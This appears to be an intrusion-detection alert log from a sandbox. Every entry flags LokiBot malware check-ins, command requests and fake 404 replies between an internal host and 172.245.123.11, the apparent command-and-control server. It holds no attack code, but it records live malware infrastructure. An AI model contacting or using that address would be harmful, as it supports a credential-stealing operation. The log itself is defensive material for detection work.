2025-01-07T11:02:27.947960+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49834	172.245.123.11	80	TCP
2025-01-07T11:02:27.947960+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49834	172.245.123.11	80	TCP
2025-01-07T11:02:28.470234+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49834	172.245.123.11	80	TCP
2025-01-07T11:02:28.470234+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49834	172.245.123.11	80	TCP
2025-01-07T11:02:28.470446+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49834	TCP
2025-01-07T11:02:28.637968+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49839	172.245.123.11	80	TCP
2025-01-07T11:02:28.637968+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49839	172.245.123.11	80	TCP
2025-01-07T11:02:28.637968+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49839	172.245.123.11	80	TCP
2025-01-07T11:02:29.132407+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49839	172.245.123.11	80	TCP
2025-01-07T11:02:29.132407+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49839	172.245.123.11	80	TCP
2025-01-07T11:02:29.132414+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49839	TCP
2025-01-07T11:02:29.308443+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49843	172.245.123.11	80	TCP
2025-01-07T11:02:29.308443+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49843	172.245.123.11	80	TCP
2025-01-07T11:02:29.308443+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49843	172.245.123.11	80	TCP
2025-01-07T11:02:29.819500+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49843	172.245.123.11	80	TCP
2025-01-07T11:02:29.819500+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49843	172.245.123.11	80	TCP
2025-01-07T11:02:29.819607+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49843	TCP
2025-01-07T11:02:30.085557+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49849	172.245.123.11	80	TCP
2025-01-07T11:02:30.085557+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49849	172.245.123.11	80	TCP
2025-01-07T11:02:30.085557+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49849	172.245.123.11	80	TCP
2025-01-07T11:02:30.594718+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49849	172.245.123.11	80	TCP
2025-01-07T11:02:30.594718+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49849	172.245.123.11	80	TCP
2025-01-07T11:02:30.599583+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49849	TCP
2025-01-07T11:02:30.768828+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49854	172.245.123.11	80	TCP
2025-01-07T11:02:30.768828+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49854	172.245.123.11	80	TCP
2025-01-07T11:02:30.768828+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49854	172.245.123.11	80	TCP
2025-01-07T11:02:31.270511+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49854	172.245.123.11	80	TCP
2025-01-07T11:02:31.270511+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49854	172.245.123.11	80	TCP
2025-01-07T11:02:31.280966+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49854	TCP
2025-01-07T11:02:31.465790+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49860	172.245.123.11	80	TCP
2025-01-07T11:02:31.465790+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49860	172.245.123.11	80	TCP
2025-01-07T11:02:31.465790+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49860	172.245.123.11	80	TCP
2025-01-07T11:02:31.967447+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49860	172.245.123.11	80	TCP
2025-01-07T11:02:31.967447+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49860	172.245.123.11	80	TCP
2025-01-07T11:02:31.972261+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49860	TCP
2025-01-07T11:02:32.162958+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49865	172.245.123.11	80	TCP
2025-01-07T11:02:32.162958+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49865	172.245.123.11	80	TCP
2025-01-07T11:02:32.162958+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49865	172.245.123.11	80	TCP
2025-01-07T11:02:32.650824+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49865	172.245.123.11	80	TCP
2025-01-07T11:02:32.650824+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49865	172.245.123.11	80	TCP
2025-01-07T11:02:32.650889+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49865	TCP
2025-01-07T11:02:33.125642+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49872	172.245.123.11	80	TCP
2025-01-07T11:02:33.125642+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49872	172.245.123.11	80	TCP
2025-01-07T11:02:33.125642+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49872	172.245.123.11	80	TCP
2025-01-07T11:02:33.618441+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49872	172.245.123.11	80	TCP
2025-01-07T11:02:33.618441+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49872	172.245.123.11	80	TCP
2025-01-07T11:02:33.623252+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49872	TCP
2025-01-07T11:02:33.779104+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49877	172.245.123.11	80	TCP
2025-01-07T11:02:33.779104+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49877	172.245.123.11	80	TCP
2025-01-07T11:02:33.779104+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49877	172.245.123.11	80	TCP
2025-01-07T11:02:34.281865+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49877	172.245.123.11	80	TCP
2025-01-07T11:02:34.281865+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49877	172.245.123.11	80	TCP
2025-01-07T11:02:34.286606+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49877	TCP
2025-01-07T11:02:34.503792+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49883	172.245.123.11	80	TCP
2025-01-07T11:02:34.503792+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49883	172.245.123.11	80	TCP
2025-01-07T11:02:34.503792+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49883	172.245.123.11	80	TCP
2025-01-07T11:02:35.003595+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49883	172.245.123.11	80	TCP
2025-01-07T11:02:35.003595+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49883	172.245.123.11	80	TCP
2025-01-07T11:02:35.008395+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49883	TCP
2025-01-07T11:02:35.152174+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49889	172.245.123.11	80	TCP
2025-01-07T11:02:35.152174+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49889	172.245.123.11	80	TCP
2025-01-07T11:02:35.152174+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49889	172.245.123.11	80	TCP
2025-01-07T11:02:35.669509+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49889	172.245.123.11	80	TCP
2025-01-07T11:02:35.669509+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49889	172.245.123.11	80	TCP
2025-01-07T11:02:35.674272+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49889	TCP
2025-01-07T11:02:35.829436+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49895	172.245.123.11	80	TCP
2025-01-07T11:02:35.829436+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49895	172.245.123.11	80	TCP
2025-01-07T11:02:35.829436+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49895	172.245.123.11	80	TCP
2025-01-07T11:02:36.331257+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49895	172.245.123.11	80	TCP
2025-01-07T11:02:36.331257+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49895	172.245.123.11	80	TCP
2025-01-07T11:02:36.336073+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49895	TCP
2025-01-07T11:02:36.478731+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49901	172.245.123.11	80	TCP
2025-01-07T11:02:36.478731+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49901	172.245.123.11	80	TCP
2025-01-07T11:02:36.478731+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49901	172.245.123.11	80	TCP
2025-01-07T11:02:36.981306+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49901	172.245.123.11	80	TCP
2025-01-07T11:02:36.981306+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49901	172.245.123.11	80	TCP
2025-01-07T11:02:36.981365+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49901	TCP
2025-01-07T11:02:37.135567+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49907	172.245.123.11	80	TCP
2025-01-07T11:02:37.135567+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49907	172.245.123.11	80	TCP
2025-01-07T11:02:37.135567+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49907	172.245.123.11	80	TCP
2025-01-07T11:02:37.629932+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49907	172.245.123.11	80	TCP
2025-01-07T11:02:37.629932+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49907	172.245.123.11	80	TCP
2025-01-07T11:02:37.637059+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49907	TCP
2025-01-07T11:02:37.908206+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49912	172.245.123.11	80	TCP
2025-01-07T11:02:37.908206+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49912	172.245.123.11	80	TCP
2025-01-07T11:02:37.908206+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49912	172.245.123.11	80	TCP
2025-01-07T11:02:38.440568+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49912	172.245.123.11	80	TCP
2025-01-07T11:02:38.440568+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49912	172.245.123.11	80	TCP
2025-01-07T11:02:38.445345+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49912	TCP
2025-01-07T11:02:38.589708+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49915	172.245.123.11	80	TCP
2025-01-07T11:02:38.589708+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49915	172.245.123.11	80	TCP
2025-01-07T11:02:38.589708+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49915	172.245.123.11	80	TCP
2025-01-07T11:02:39.104350+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49915	172.245.123.11	80	TCP
2025-01-07T11:02:39.104350+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49915	172.245.123.11	80	TCP
2025-01-07T11:02:39.109905+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49915	TCP
2025-01-07T11:02:39.258110+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49920	172.245.123.11	80	TCP
2025-01-07T11:02:39.258110+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49920	172.245.123.11	80	TCP
2025-01-07T11:02:39.258110+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49920	172.245.123.11	80	TCP
2025-01-07T11:02:39.771926+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49920	172.245.123.11	80	TCP
2025-01-07T11:02:39.771926+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49920	172.245.123.11	80	TCP
2025-01-07T11:02:39.776713+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49920	TCP
2025-01-07T11:02:39.972590+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49926	172.245.123.11	80	TCP
2025-01-07T11:02:39.972590+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49926	172.245.123.11	80	TCP
2025-01-07T11:02:39.972590+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49926	172.245.123.11	80	TCP
2025-01-07T11:02:40.445565+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49926	172.245.123.11	80	TCP
2025-01-07T11:02:40.445565+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49926	172.245.123.11	80	TCP
2025-01-07T11:02:40.452674+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49926	TCP
2025-01-07T11:02:40.635703+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49932	172.245.123.11	80	TCP
2025-01-07T11:02:40.635703+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49932	172.245.123.11	80	TCP
2025-01-07T11:02:40.635703+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49932	172.245.123.11	80	TCP
2025-01-07T11:02:41.134057+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49932	172.245.123.11	80	TCP
2025-01-07T11:02:41.134057+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49932	172.245.123.11	80	TCP
2025-01-07T11:02:41.138836+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49932	TCP
2025-01-07T11:02:41.303821+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49934	172.245.123.11	80	TCP
2025-01-07T11:02:41.303821+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49934	172.245.123.11	80	TCP
2025-01-07T11:02:41.303821+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49934	172.245.123.11	80	TCP
2025-01-07T11:02:41.803713+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49934	172.245.123.11	80	TCP
2025-01-07T11:02:41.803713+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49934	172.245.123.11	80	TCP
2025-01-07T11:02:41.803936+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49934	TCP
2025-01-07T11:02:41.967237+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49940	172.245.123.11	80	TCP
2025-01-07T11:02:41.967237+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49940	172.245.123.11	80	TCP
2025-01-07T11:02:41.967237+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49940	172.245.123.11	80	TCP
2025-01-07T11:02:42.460094+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49940	172.245.123.11	80	TCP
2025-01-07T11:02:42.460094+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49940	172.245.123.11	80	TCP
2025-01-07T11:02:42.465580+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49940	TCP
2025-01-07T11:02:42.625053+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49946	172.245.123.11	80	TCP
2025-01-07T11:02:42.625053+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49946	172.245.123.11	80	TCP
2025-01-07T11:02:42.625053+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49946	172.245.123.11	80	TCP
2025-01-07T11:02:43.145887+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49946	172.245.123.11	80	TCP
2025-01-07T11:02:43.145887+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49946	172.245.123.11	80	TCP
2025-01-07T11:02:43.151462+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49946	TCP
2025-01-07T11:02:43.363394+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49952	172.245.123.11	80	TCP
2025-01-07T11:02:43.363394+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49952	172.245.123.11	80	TCP
2025-01-07T11:02:43.363394+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49952	172.245.123.11	80	TCP
2025-01-07T11:02:43.852429+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49952	172.245.123.11	80	TCP
2025-01-07T11:02:43.852429+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49952	172.245.123.11	80	TCP
2025-01-07T11:02:43.857197+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49952	TCP
2025-01-07T11:02:44.019633+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49958	172.245.123.11	80	TCP
2025-01-07T11:02:44.019633+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49958	172.245.123.11	80	TCP
2025-01-07T11:02:44.019633+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49958	172.245.123.11	80	TCP
2025-01-07T11:02:44.522317+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49958	172.245.123.11	80	TCP
2025-01-07T11:02:44.522317+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49958	172.245.123.11	80	TCP
2025-01-07T11:02:44.522405+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49958	TCP
2025-01-07T11:02:44.684154+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49964	172.245.123.11	80	TCP
2025-01-07T11:02:44.684154+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49964	172.245.123.11	80	TCP
2025-01-07T11:02:44.684154+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49964	172.245.123.11	80	TCP
2025-01-07T11:02:45.350075+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49964	172.245.123.11	80	TCP
2025-01-07T11:02:45.350075+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49964	172.245.123.11	80	TCP
2025-01-07T11:02:45.355010+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49964	TCP
2025-01-07T11:02:45.507465+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49969	172.245.123.11	80	TCP
2025-01-07T11:02:45.507465+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49969	172.245.123.11	80	TCP
2025-01-07T11:02:45.507465+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49969	172.245.123.11	80	TCP
2025-01-07T11:02:46.030026+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49969	172.245.123.11	80	TCP
2025-01-07T11:02:46.030026+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49969	172.245.123.11	80	TCP
2025-01-07T11:02:46.030084+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49969	TCP
2025-01-07T11:02:46.180115+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49971	172.245.123.11	80	TCP
2025-01-07T11:02:46.180115+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49971	172.245.123.11	80	TCP
2025-01-07T11:02:46.180115+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49971	172.245.123.11	80	TCP
2025-01-07T11:02:46.699521+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49971	172.245.123.11	80	TCP
2025-01-07T11:02:46.699521+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49971	172.245.123.11	80	TCP
2025-01-07T11:02:46.699686+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49971	TCP
2025-01-07T11:02:46.851221+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49976	172.245.123.11	80	TCP
2025-01-07T11:02:46.851221+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49976	172.245.123.11	80	TCP
2025-01-07T11:02:46.851221+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49976	172.245.123.11	80	TCP
2025-01-07T11:02:47.374652+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49976	172.245.123.11	80	TCP
2025-01-07T11:02:47.374652+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49976	172.245.123.11	80	TCP
2025-01-07T11:02:47.381254+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49976	TCP
2025-01-07T11:02:47.795111+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49982	172.245.123.11	80	TCP
2025-01-07T11:02:47.795111+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49982	172.245.123.11	80	TCP
2025-01-07T11:02:47.795111+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49982	172.245.123.11	80	TCP
2025-01-07T11:02:48.292985+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49982	172.245.123.11	80	TCP
2025-01-07T11:02:48.292985+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49982	172.245.123.11	80	TCP
2025-01-07T11:02:48.298557+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49982	TCP
2025-01-07T11:02:48.451009+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49987	172.245.123.11	80	TCP
2025-01-07T11:02:48.451009+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49987	172.245.123.11	80	TCP
2025-01-07T11:02:48.451009+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49987	172.245.123.11	80	TCP
2025-01-07T11:02:49.000377+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49987	172.245.123.11	80	TCP
2025-01-07T11:02:49.000377+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49987	172.245.123.11	80	TCP
2025-01-07T11:02:49.006487+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49987	TCP
2025-01-07T11:02:49.150118+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49994	172.245.123.11	80	TCP
2025-01-07T11:02:49.150118+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49994	172.245.123.11	80	TCP
2025-01-07T11:02:49.150118+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49994	172.245.123.11	80	TCP
2025-01-07T11:02:49.647470+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49994	172.245.123.11	80	TCP
2025-01-07T11:02:49.647470+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49994	172.245.123.11	80	TCP
2025-01-07T11:02:49.647518+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49994	TCP
2025-01-07T11:02:49.806913+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50000	172.245.123.11	80	TCP
2025-01-07T11:02:49.806913+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50000	172.245.123.11	80	TCP
2025-01-07T11:02:49.806913+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50000	172.245.123.11	80	TCP
2025-01-07T11:02:50.327734+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50000	172.245.123.11	80	TCP
2025-01-07T11:02:50.327734+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50000	172.245.123.11	80	TCP
2025-01-07T11:02:50.336299+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50000	TCP
2025-01-07T11:02:50.480746+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50006	172.245.123.11	80	TCP
2025-01-07T11:02:50.480746+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50006	172.245.123.11	80	TCP
2025-01-07T11:02:50.480746+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50006	172.245.123.11	80	TCP
2025-01-07T11:02:51.066587+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50006	172.245.123.11	80	TCP
2025-01-07T11:02:51.066587+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50006	172.245.123.11	80	TCP
2025-01-07T11:02:51.071482+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50006	TCP
2025-01-07T11:02:51.210960+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50009	172.245.123.11	80	TCP
2025-01-07T11:02:51.210960+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50009	172.245.123.11	80	TCP
2025-01-07T11:02:51.210960+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50009	172.245.123.11	80	TCP
2025-01-07T11:02:51.758580+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50009	172.245.123.11	80	TCP
2025-01-07T11:02:51.758580+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50009	172.245.123.11	80	TCP
2025-01-07T11:02:51.758585+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50009	TCP
